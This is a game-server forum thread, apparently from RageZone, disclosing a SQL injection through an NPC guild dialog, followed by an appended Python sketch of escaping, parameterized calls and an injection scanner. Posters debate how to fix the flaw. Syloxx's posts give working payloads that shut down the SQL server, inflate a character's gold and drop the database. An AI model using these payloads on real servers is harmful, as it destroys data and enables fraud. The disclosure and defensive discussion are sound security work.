[INFORMATION] SQL Injection (ingame)

  1. #1 Syloxx (Member, Germany)

    Hello Ragezone,
    I just want to inform you that I discovered a new, very harmful exploit.
    It is possible to execute an SQL injection through the Fortresswar Administrator NPC with the "About Guild" dialog.

    example:
        test' shutdown--
    This example will shut down the SQL server.

    Screenshot:
  2. #2 NourAyman (True Member)

    Sounds like "welcome to hell" for the community, lmao.

  3. #3 PlayerSRO (Member)

    nice exploit
    Last edited by PlayerSRO; 14-09-16 at 06:20 PM.

  4. #4 Jangan (Certified Database Admin, Developer, Amman, Jordan)

    Easy to patch: open the related stored procedure and modify it to be SQL-injection proof. Then add checks and validators to make sure everything is run properly.

    You could also just remove the NPC, but I do recommend that people learn how to counter SQL injections.
    I Do not answer PM or Skype!
    I Do not have/buy/sell server files!

    !~Contribute Back To The Community~!
    Please
    Rep and Like the author!

  5. #5 Syloxx (Member, Germany)

    Quote Originally Posted by Jangan:
    > Easy to patch: open the related stored procedure and modify it to be SQL-injection proof. Then add checks and validators to make sure everything is run properly.
    >
    > You could also just remove the NPC, but I do recommend that people learn how to counter SQL injections.

    1st)
    The game server sends an UPDATE statement to the SQL server, which means there isn't anything to modify.

    2nd)
    Even if it were a procedure it wouldn't work; let me show you why. I use the _ADD_NEW_ITEM procedure as an example (red = static, set by the server / green = input by the user).

    Normal:
    EXEC _ADD_NEW_ITEM 'Syloxx', 'ITEM_CH_TBLADE_01_C_RARE'

    Injection:
    EXEC _ADD_NEW_ITEM 'Syloxx', 'ITEM_CH_TBLADE_01_C_RARE' UPDATE _Char SET RemainGold = 999999999999 WHERE CharName16 = 'Syloxx'--'

    Injection (added formatting to make it clearer):
    EXEC _ADD_NEW_ITEM 'Syloxx', '
    ITEM_CH_TBLADE_01_C_RARE'
    UPDATE _Char SET RemainGold = 999999999999 WHERE CharName16 = 'Syloxx'--
    '

    As you can see, the server executes the procedure with a valid string and then executes an UPDATE statement right after the procedure has run.

    It is impossible to fix an SQL injection inside the SQL server; you have to fix the application or use a workaround (a packet filter, for example).

    -Syloxx
    Last edited by Syloxx; 20-10-16 at 07:39 AM.


  6. #6 UniverseGaming (True Member)

    I do believe you are a moron, because stored procedures don't accept queries, only params. So, for example, say inside the stored procedure you have a query that requires a username: the program or script would call exec storedprocname with the params it needs, and then the query runs with the data inside the SQL server.

  7. #7 Syloxx (Member, Germany)

    Quote Originally Posted by UniverseGaming:
    > I do believe you are a moron, because stored procedures don't accept queries, only params. So, for example, say inside the stored procedure you have a query that requires a username: the program or script would call exec storedprocname with the params it needs, and then the query runs with the data inside the SQL server.

    @UniverseGaming looks like you are the moron...

    You close the string, give all required parameters and add your query to it.

    I will write an example procedure with 3 parameters (string1 is set by the player through the message box; int1 and int2 are set by the server, for example CharID and ItemID).

    Try to understand what the GameServer sends to the SQL Server and what the SQL Server executes.

    In the solution spoiler you find the whole command with T-SQL highlights for better understanding. Please try to solve it by yourself first.

    example call:
        exec _Procedure 'string1', int1, int2    (string1 = your input)

    input:
        string1', int1, int2; DROP DATABASE();--

    SOLUTION (spoiler):
        exec _Procedure 'string1', int1, int2; DROP DATABASE();--', int1, int2
    Last edited by Syloxx; 25-10-16 at 04:20 PM.


  8. #8 Jangan (Certified Database Admin, Developer, Amman, Jordan)

    Oh dear...

    1) Relationship design.
    2) Tables design.
    3) Stored procedure design.

    Work on those 3 and you will never see SQL injection in your life again.

    Everything you wrote can be stopped by properly re-writing the procedure, or by altering the table column from varchar(255)/varchar(max) to varchar(20/30), for example, and the game server should work fine. If not (since I haven't touched SRO in years), you can basically just modify the stored procedure.

    By your logic, I should be able to inject every single game ever made, because there is no way to stop SQL injection, right?

    Anyway -> Are stored procedures safe against SQL injection? - Paladion Networks ; How to prevent SQL Injection in Stored Procedures - CodeProject

    Have a great day :)

  9. #9 Syloxx (Member, Germany)

    Quote Originally Posted by Jangan:
    > Oh dear...
    >
    > 1) Relationship design.
    > 2) Tables design.
    > 3) Stored procedure design.
    >
    > Work on those 3 and you will never see SQL injection in your life again.
    >
    > Everything you wrote can be stopped by properly re-writing the procedure, or by altering the table column from varchar(255)/varchar(max) to varchar(20/30), for example, and the game server should work fine. If not (since I haven't touched SRO in years), you can basically just modify the stored procedure.
    >
    > By your logic, I should be able to inject every single game ever made, because there is no way to stop SQL injection, right?
    >
    > Anyway -> Are stored procedures safe against SQL injection? - Paladion Networks ; How to prevent SQL Injection in Stored Procedures - CodeProject
    >
    > Have a great day :)

    varchar limit (spoiler):
        xxx'; DROP DATABASE() --varchar(3) is enough

    About stored procedure injection (spoiler):
    I didn't read the blog, but I am pretty sure all he talks about is that queries INSIDE the procedure can't be used for SQL injection (the call itself can).

    About the "every game would be vulnerable" (spoiler):
    No, the job of the application that sends the call command is to filter the input (remove the ' or escape it, etc.).

    As you can see, the SQL procedure isn't invalid; all you do is add an additional query to that call.
    Last edited by Syloxx; 25-10-16 at 06:42 PM.
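Added example, not written by any poster in this thread: a Python sketch of the string-building that posts #5 and #7 describe, next to the escaped and parameterized forms post #9 asks the application for, plus a scanner a packet filter could use to flag a call that carries a second statement. The names _Procedure, string1/int1/int2 and the payload are the thread's own; the keyword scanner and the '?' placeholder convention (DB-API style, as pyodbc uses) are assumptions.

```python
import re
# Keywords that begin a T-SQL statement; a plain procedure call contains exactly one (EXEC).
STATEMENT_KEYWORDS = {"EXEC", "EXECUTE", "SELECT", "INSERT", "UPDATE", "DELETE",
                      "DROP", "ALTER", "CREATE", "TRUNCATE", "SHUTDOWN"}

def strip_literals_and_comments(sql):
    """Blank out the inside of '...' literals and -- comments, scoping them the way the
    SQL parser does; a doubled quote ('') is T-SQL's escape and stays inside the literal."""
    out, i, n, in_string = [], 0, len(sql), False
    while i < n:
        c = sql[i]
        if in_string:
            if sql.startswith("''", i):
                i += 2                       # escaped quote: still inside the literal
                continue
            in_string = c != "'"             # a lone quote closes the literal
            i += 1
        elif c == "'":
            in_string = True
            out.append(" ")                  # keep tokens on both sides separated
            i += 1
        elif sql.startswith("--", i):        # comment runs to end of line (or end of text)
            nl = sql.find("\n", i)
            i = n if nl == -1 else nl
        else:
            out.append(c)
            i += 1
    return "".join(out)

def statement_keywords(sql):
    """Statement-starting keywords the server would really execute (outside literals/comments)."""
    bare = strip_literals_and_comments(sql)
    return [t.upper() for t in re.findall(r"[A-Za-z_]\w*", bare) if t.upper() in STATEMENT_KEYWORDS]

def escape_literal(value):
    return value.replace("'", "''")          # the "escape it" option from post #9

def build_concat(string1, int1, int2):
    # What the thread says the game server does: player text pasted straight into the EXEC text.
    return f"exec _Procedure '{string1}', {int1}, {int2}"

def build_escaped(string1, int1, int2):
    return f"exec _Procedure '{escape_literal(string1)}', {int1}, {int2}"

def build_parameterized(string1, int1, int2):
    # Preferred fix: fixed SQL text plus a separate value tuple ('?' placeholders, DB-API/pyodbc style).
    return "exec _Procedure ?, ?, ?", (string1, int1, int2)

INJECTED = "string1', int1, int2; DROP DATABASE();--"   # the payload from post #7 (constructed call)
```

A call is suspect as soon as statement_keywords() returns more than one entry; note that the varchar(20/30) column limit from post #8 never sees this text at all, because the appended query runs before anything is stored.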